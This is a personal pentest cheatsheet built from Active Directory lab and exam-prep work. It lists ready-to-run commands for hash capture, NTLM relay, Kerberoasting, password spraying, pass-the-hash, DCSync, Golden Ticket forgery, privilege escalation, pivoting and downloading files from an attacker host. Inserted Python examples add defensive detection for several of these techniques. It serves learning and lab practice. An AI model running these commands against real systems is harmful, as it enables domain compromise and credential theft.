Pentest Cheatsheet

Built from my own lab work, PEH course notes, and PNPT exam prep. Not a generic reference. Every command here is something I have actually run in my AD lab on the DT (HP Z440, 128GB RAM, Quadro K2200). Updated as I learn new techniques.

Hashcat commands use my exact DT path. Both PNPT and PT1 exams allow all tools, your own machines, and are not proctored.

88 commands across 12 sections
ftp <ip> (user: anonymous)

Port 21 -- FTP anonymous login check

hydra -l user -P wordlist ssh://<ip>

Port 22 -- SSH brute force

smtp-user-enum -M VRFY -U users.txt -t <ip>

Port 25 -- SMTP user enumeration

dig axfr @<ip> <domain>

Port 53 -- DNS zone transfer

whatweb <url> && gobuster dir -u <url> -w <wordlist>

Port 80/443 -- HTTP tech fingerprint + directory brute-force

enum4linux -a <ip>

Port 139/445 -- SMB null session enumeration

smbclient -L //<ip>/ -N

Port 139/445 -- List SMB shares without creds

nmap --script smb2-security-mode -p 445 <ip>

Port 445 -- Check SMB signing (for relay attacks)

ldapsearch -x -H ldap://<ip> -s base namingcontexts

Port 389 -- LDAP anonymous bind

evil-winrm -i <ip> -u user -p pass

Port 5985 -- WinRM shell access

mssqlclient.py user:pass@<ip>

Port 1433 -- MSSQL login (xp_cmdshell for RCE)

xfreerdp /u:user /p:pass /v:<ip>

Port 3389 -- RDP connection

whois <domain>

Domain registration info

dig <domain> ANY

All DNS records

amass enum -passive -d <domain>

Passive subdomain enumeration

assetfinder <domain>

Subdomain discovery via certificate transparency

theHarvester -d <domain> -b google,bing,linkedin

Email and subdomain harvesting

shodan search hostname:<domain>

Exposed services and banners

nmap -sn <subnet>/24

Host discovery (ping sweep)

nmap -sC -sV -oN initial.nmap <ip>

Top 1000 ports with scripts + versions

nmap -p- -T4 -oN allports.nmap <ip>

Full 65535 port scan

nmap -sU --top-ports 50 <ip>

UDP scan (SNMP, TFTP, DNS)

sudo responder -I eth0 -dPv

LLMNR/NBT-NS poisoning -- capture NTLMv2 hashes

Safe to run all day. Best times: morning + after lunch.

nmap --script=smb2-security-mode.nse -p445 <subnet>/24

Check SMB signing for relay targets ('enabled but not required' = vulnerable)
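The two smb2-security-mode commands above (single host and whole subnet) print one signing line per host; this added example, not part of the original cheatsheet, parses a constructed `-oN` report into a remediation list of hosts that do not require signing. Addresses and results in the sample are made up.

```python
import re

# Constructed sample of `nmap --script=smb2-security-mode -p445 <subnet>/24`
# normal (-oN) output; addresses and results are made up for this example.
SAMPLE_NMAP = """\
Nmap scan report for 10.0.0.5
Host script results:
| smb2-security-mode:
|_    Message signing enabled and required

Nmap scan report for 10.0.0.21
Host script results:
| smb2-security-mode:
|_    Message signing enabled but not required

Nmap scan report for 10.0.0.33
Host script results:
| smb2-security-mode:
|_    Message signing is disabled!
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SIGN_RE = re.compile(r"Message signing (.+)$")

def parse_signing(report):
    """Map each host in an nmap -oN report to its SMB2 signing state:
    'required', 'not_required' or 'disabled'. Hosts with no signing line
    are left out rather than guessed."""
    state, host = {}, None
    for line in report.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = SIGN_RE.search(line)
        if m and host:
            text = m.group(1).lower()
            if "not required" in text:      # checked first: it also contains "required"
                state[host] = "not_required"
            elif "disabled" in text:
                state[host] = "disabled"
            elif "required" in text:
                state[host] = "required"
    return state

def relayable_hosts(report):
    """Hosts that accept unsigned SMB sessions, i.e. where a captured NTLM
    authentication could be relayed. This is the fix list: enforce the GPO
    'Microsoft network server: Digitally sign communications (always)'."""
    return sorted(h for h, s in parse_signing(report).items() if s != "required")
```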

sudo ntlmrelayx.py -tf targets.txt -smb2support

SMB Relay (default: SAM dump). Turn OFF SMB+HTTP in Responder.conf first.

sudo ntlmrelayx.py -tf targets.txt -smb2support -i

SMB Relay with interactive shell. Connect: nc 127.0.0.1 11000

sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

SMB Relay with command execution

sudo mitm6 -d <domain.local>

IPv6 DNS takeover. Run for 5-10 min MAX (can cause outages).

ntlmrelayx.py -6 -t ldaps://<DC-IP> -wh fakewpad.<domain> -l lootme

mitm6 LDAPS relay. Dumps domain info. If DA logs in: auto-creates DCSync user.

GetNPUsers.py <domain>/ -usersfile users.txt -no-pass -dc-ip <DC>

AS-REP Roasting (no creds needed). Crack with hashcat -m 18200.

bloodhound-python -u user -p pass -d <domain> -c all -ns <DC>

BloodHound data collection. Import JSON, find shortest paths to DA.

GetUserSPNs.py <domain>/user:pass -dc-ip <DC> -request

Kerberoasting. Crack TGS hash with hashcat -m 13100. Run this FIRST.
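Both roasting commands above (GetNPUsers.py and GetUserSPNs.py -request) leave a distinctive trace on the domain controller; this added example, not from the original cheatsheet, runs the corresponding detection over constructed 4768/4769 records. Field names are shortened from what Windows logs (`TicketEncryptionType`, `PreAuthType`, `ServiceName`), and the source addresses and account names are made up.

```python
from collections import defaultdict

# Constructed sample of DC Kerberos audit events with the fields Windows logs:
# 4769 = service ticket (TGS) request, 4768 = TGT request.
SAMPLE_EVENTS = [
    {"id": 4769, "src": "10.0.0.50", "svc": "svc_sql",    "enc": "0x17", "t": 100},
    {"id": 4769, "src": "10.0.0.50", "svc": "svc_web",    "enc": "0x17", "t": 101},
    {"id": 4769, "src": "10.0.0.50", "svc": "svc_backup", "enc": "0x17", "t": 101},
    {"id": 4769, "src": "10.0.0.80", "svc": "WS07$",      "enc": "0x12", "t": 102},
    {"id": 4768, "src": "10.0.0.50", "user": "svc_legacy", "preauth": "0", "enc": "0x17", "t": 103},
    {"id": 4768, "src": "10.0.0.81", "user": "carol",      "preauth": "2", "enc": "0x12", "t": 104},
]

RC4_HMAC = "0x17"  # TicketEncryptionType for etype 23; AES is 0x11 / 0x12

def kerberoast_suspects(events, min_services=3, window=60):
    """Source IPs that pulled RC4 service tickets for >= min_services distinct
    user-account SPNs inside `window` seconds. Roasting tools ask for RC4 because
    it cracks fastest (hashcat -m 13100); a burst of them from one host is the tell."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] != 4769 or e["enc"] != RC4_HMAC:
            continue
        svc = e["svc"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # computer accounts have random passwords; krbtgt is the TGT itself
        by_src[e["src"]].append((e["t"], svc))
    hits = {}
    for src, reqs in by_src.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            names = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(names) >= min_services:
                hits[src] = sorted(names)
                break
    return hits

def asrep_roast_suspects(events):
    """TGTs issued with Pre-Authentication Type 0: the account has
    'Do not require Kerberos preauthentication' set, so its AS-REP can be
    cracked offline (hashcat -m 18200). Clear the flag or rotate to a strong password."""
    return sorted({e["user"] for e in events
                   if e["id"] == 4768 and e.get("preauth") == "0"})
```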

crackmapexec smb <DC> -u users.txt -p 'Pass123' --continue-on-success

Password spraying. Check --pass-pol first to avoid lockouts.

crackmapexec smb <DC> -u user -p pass --pass-pol

Dump password policy before spraying
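The defensive counterpart to the two spraying commands above, added here and not part of the original cheatsheet: over constructed 4625 (logon failure) records it shows why a spray that stays under the --pass-pol lockout threshold never produces a 4740 lockout event, and why distinct accounts per source is the signal to alert on instead. Source addresses and user names are made up; the sub-status codes are the real NTSTATUS values Windows logs.

```python
from collections import defaultdict

# Constructed sample of Event ID 4625 records as (source_ip, target_user,
# sub_status, seconds). 0xC000006A = wrong password, 0xC0000064 = no such user.
SAMPLE_4625 = [
    ("10.0.0.50", "alice", "0xC000006A", 10),
    ("10.0.0.50", "bob",   "0xC000006A", 11),
    ("10.0.0.50", "carol", "0xC000006A", 11),
    ("10.0.0.50", "dave",  "0xC000006A", 12),
    ("10.0.0.50", "erin",  "0xC0000064", 12),   # the user list was not validated
    ("10.0.0.77", "frank", "0xC000006A", 10),
    ("10.0.0.77", "frank", "0xC000006A", 30),
    ("10.0.0.77", "frank", "0xC000006A", 50),
]

def spray_sources(events, min_users=4, window=60):
    """Source IPs that failed logons for >= min_users distinct accounts within
    `window` seconds: one password tried across many users (the inverse of
    brute force, which 10.0.0.77 shows). Non-existent users count too."""
    by_src = defaultdict(list)
    for src, user, _status, t in events:
        by_src[src].append((t, user))
    hits = []
    for src, rows in by_src.items():
        rows.sort()
        for i, (t0, _) in enumerate(rows):
            users = {u for t, u in rows[i:] if t - t0 <= window}
            if len(users) >= min_users:
                hits.append(src)
                break
    return sorted(hits)

def expected_lockouts(events, threshold, window):
    """Accounts whose wrong-password count reaches the lockout threshold inside
    the observation window (the two numbers --pass-pol prints). Only these
    generate a 4740; a spray keeps every account below the threshold."""
    by_user = defaultdict(list)
    for _src, user, status, t in events:
        if status == "0xC000006A":  # only real accounts with wrong passwords count
            by_user[user].append(t)
    locked = []
    for user, times in by_user.items():
        times.sort()
        for i, t0 in enumerate(times):
            if sum(1 for t in times[i:] if t - t0 <= window) >= threshold:
                locked.append(user)
                break
    return sorted(locked)
```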

secretsdump.py <domain>/user:'pass'@<ip>

Dump SAM + cached creds + LSA secrets. Check for WDigest cleartext!

secretsdump.py administrator@<ip> -hashes <LM:NT>

secretsdump with hash (no password needed)

crackmapexec smb <subnet>/24 -u user -d DOMAIN -p pass

Pass-the-Password sweep (domain creds)

crackmapexec smb <subnet>/24 -u administrator -H <hash> --local-auth

Pass-the-Hash sweep (local admin)

crackmapexec smb <subnet>/24 -u admin -H <hash> --local-auth --sam

Dump SAM from every Pwn3d host

crackmapexec smb <subnet>/24 -u admin -H <hash> --local-auth --lsa

Dump LSA secrets (DCC2 cached creds)

crackmapexec smb <subnet>/24 -u admin -H <hash> --local-auth --shares

Enumerate shares on Pwn3d hosts

psexec.py <DOMAIN>/user:'pass'@<ip>

Get SYSTEM shell (preferred, less noisy than Metasploit)

psexec.py administrator@<ip> -hashes <LM:NT>

Shell via Pass-the-Hash

wmiexec.py <DOMAIN>/user:'pass'@<ip>

Shell fallback (fewer artifacts than psexec)

smbexec.py <DOMAIN>/user:'pass'@<ip>

Shell fallback (no file on disk, stealthiest)

cmedb

CrackMapExec database. Commands: hosts, creds, export.

secretsdump.py <domain>/admin:pass@<DC>

DCSync -- dump NTDS.dit (every hash in the domain)

ticketer.py -nthash <krbtgt_hash> -domain-sid <SID> -domain <domain> Administrator

Golden Ticket -- forge TGT with krbtgt hash

export KRB5CCNAME=Administrator.ccache && psexec.py <domain>/Admin@<DC> -k -no-pass

Use Golden Ticket for persistent DA access

whoami /all && systeminfo && net user

First commands after landing on Windows

winPEASany.exe

Automated Windows privesc enumeration

PrintSpoofer.exe -i -c cmd

SeImpersonatePrivilege -> SYSTEM (Win10/2016+)

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\\windows" | findstr /i /v """

Find unquoted service paths
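The wmic filter above lists candidates; this added example (not from the original cheatsheet) applies the same filter to constructed rows in the shape wmic returns and, for each unquoted path, works out exactly which files the service control manager would try before the real binary. Service names and paths are made up.

```python
# Constructed sample rows in the shape `wmic service get name,pathname,startmode`
# returns (Name, PathName, StartMode); service names and paths are made up.
SAMPLE_SERVICES = [
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("VulnSvc", r"C:\Program Files\Vuln Corp\Agent Service\agent.exe -k", "Auto"),
    ("GoodSvc", r'"C:\Program Files\Good Corp\svc.exe" -k', "Auto"),
    ("ManSvc",  r"C:\Program Files\Other\thing.exe", "Manual"),
    ("NoSpace", r"C:\Tools\svc.exe", "Auto"),
]

def hijack_candidates(pathname):
    """Files the service control manager would try, in order, before the real
    executable when an unquoted path contains spaces: each space-delimited
    prefix with '.exe' appended. Stops at the first prefix already ending in .exe."""
    parts = pathname.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            break  # this is the real binary; anything after it is arguments
        candidates.append(prefix + ".exe")
    return candidates

def unquoted_auto_services(rows):
    """Apply the cheatsheet's filter (auto-start, outside C:\\Windows, path not
    quoted) and keep only services that really expose a hijackable prefix.
    The parent directory of every listed file must not be writable by
    standard users, and the real fix is to quote the service's ImagePath."""
    findings = {}
    for name, path, mode in rows:
        if mode.lower() != "auto" or path.startswith('"'):
            continue
        if path.lower().startswith(r"c:\windows"):
            continue
        candidates = hijack_candidates(path)
        if candidates:
            findings[name] = candidates
    return findings
```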

cmdkey /list

Check for stored credentials (then runas /savecred)

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Check AlwaysInstallElevated for MSI privesc

schtasks /query /fo LIST /v

Find scheduled tasks with writable scripts

Watson.exe

Kernel exploit suggester (last resort)

id && uname -a && sudo -l

First commands after landing on Linux

./linpeas.sh

Automated Linux privesc enumeration

sudo vim -c ':!/bin/bash'

GTFOBins: vim with sudo -> root shell

find / -perm -u=s -type f 2>/dev/null

Find SUID binaries

getcap -r / 2>/dev/null

Find binaries with capabilities

cat /etc/crontab && ls -la /etc/cron.*

Check cron jobs for writable scripts

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Docker group -> root on host filesystem

ssh -D 1080 user@<pivot>

Dynamic SOCKS proxy via SSH

ssh -L 8080:<target>:80 user@<pivot>

Local port forward (reach <target>:80 at localhost:8080)

sshuttle -r user@<pivot> <internal_subnet>/24

Transparent VPN-like proxy (no proxychains needed)

chisel server --reverse -p 8888

Chisel server (on attacker)

chisel client <attacker>:8888 R:socks

Chisel client (on pivot) -> SOCKS proxy

proxychains nmap -sT -Pn <internal_ip>

Scan through SOCKS proxy

certutil -urlcache -split -f http://<kali>/file.exe file.exe

Windows: download file via certutil

IWR -Uri http://<kali>/file.exe -OutFile file.exe

Windows: download via PowerShell

impacket-smbserver share /tmp -smb2support

Host SMB share on Kali for file transfer

wget http://<kali>/file -O /tmp/file

Linux: download file

python3 -m http.server 80

Host files on Kali (attacker side)

.\hashcat.exe -m 5600 hashes.txt rockyou.txt --backend-ignore-cuda -O

Crack NTLMv2 (Responder capture) on DT

.\hashcat.exe -m 1000 hashes.txt rockyou.txt --backend-ignore-cuda -O

Crack NTLM (SAM dump) on DT

.\hashcat.exe -m 13100 krb.txt rockyou.txt --backend-ignore-cuda -O

Crack Kerberos TGS (Kerberoasting) on DT

.\hashcat.exe -m 18200 asrep.txt rockyou.txt --backend-ignore-cuda -O

Crack AS-REP (AS-REP Roasting) on DT

.\hashcat.exe -m 2100 dcc2.txt rockyou.txt --backend-ignore-cuda -O

Crack DCC2 cached creds (from LSA dump)

.\hashcat.exe -m 5600 hashes.txt targeted.txt -r OneRuleToRuleThemStill.rule --backend-ignore-cuda -O

Rule-based cracking with targeted wordlist

cewl https://target.com -d 3 -m 5 -w custom.txt

Generate wordlist from target website

slither .

Run all Slither detectors on current project

aderyn .

Cyfrin's Rust-based static analyzer (fewer false positives)

forge test -vvvv

Run Foundry tests with verbose traces

forge test --match-test testExploit

Run specific exploit test

cast storage <contract> <slot> --rpc-url <url>

Read any storage slot on-chain (nothing is private)

echidna . --contract MyContract

Property-based fuzzing for invariant testing